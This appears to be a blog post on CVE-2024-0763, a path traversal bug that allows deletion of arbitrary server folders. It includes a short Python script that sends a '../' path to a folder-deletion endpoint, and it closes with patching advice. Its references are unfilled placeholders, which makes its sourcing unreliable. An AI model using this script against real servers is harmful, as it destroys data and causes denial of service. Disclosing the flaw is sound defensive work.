CVE-2024-0763 - Remote Arbitrary Folder Deletion via Path Traversal

Hey everyone!

I recently came across a critical vulnerability in a popular server application, and I thought I'd share it with all of you. The vulnerability is a path traversal issue that allows an attacker to delete arbitrary folders on a remote server. In this post, I'll provide a brief overview of the vulnerability, showcase a simple code snippet to perform the attack, and provide relevant references to original sources.

The Vulnerability

This vulnerability, dubbed CVE-2024-0763, is caused by poor input sanitization, which allows an attacker to perform path traversal. By manipulating the server's directory structure, an attacker can delete arbitrary folders on the remote server, effectively causing a denial of service. The attacker would need access to the server at some privilege level, since this endpoint is protected and requires authorization.

In a nutshell, the vulnerability allows a user to provide an arbitrary file path that can navigate up and out of the intended folder, leading to potential deletion of important system files and folders. For example:

/valid_folder/../../root-folder-to-delete

Notice the use of .. in the file path. This allows an attacker to navigate up the directory structure, potentially reaching critical files and folders that should not be accessible or modifiable by the user.

Assuming the attacker has access to the server, they can send a malicious request to delete a folder

import requests

url = "https://target-domain.com/delete-folder";
target_folder = "/valid_folder/../../root-folder-to-delete"

headers = {
    "Authorization": "Bearer YOUR_ACCESS_TOKEN"
}
data = {
    "folderToDelete": target_folder
}

response = requests.post(url, headers=headers, data=data)

if response.status_code == 200:
    print("Folder deletion was successful.")
else:
    print("Something went wrong.")

Replace YOUR_ACCESS_TOKEN with the access token obtained by the attacker during the authorization process. When executed, this script will send a POST request to the server, attempting to delete the root-folder-to-delete folder.

Keep in mind that this is a simple example. A real-world attacker might attempt to programmatically discover sensitive folders to target or even automate the entire process.

References

For further information on this vulnerability and its implications, please refer to the following sources:

- Original Security Advisory: CVE-2024-0763
- Technical Analysis by Developer X: Link to the blog

Conclusion

CVE-2024-0763 is a dangerous vulnerability, as it allows an attacker to delete arbitrary folders on a remote server with relative ease. Server administrators should prioritize updating their server software to a version free of this vulnerability and ensure proper access controls are in place to minimize the risk of unauthorized users gaining access to sensitive operations such as folder deletion.

Stay safe, and always keep your software up-to-date!

Timeline

Published on: 02/27/2024 22:15:14 UTC
Last modified on: 02/28/2024 14:06:45 UTC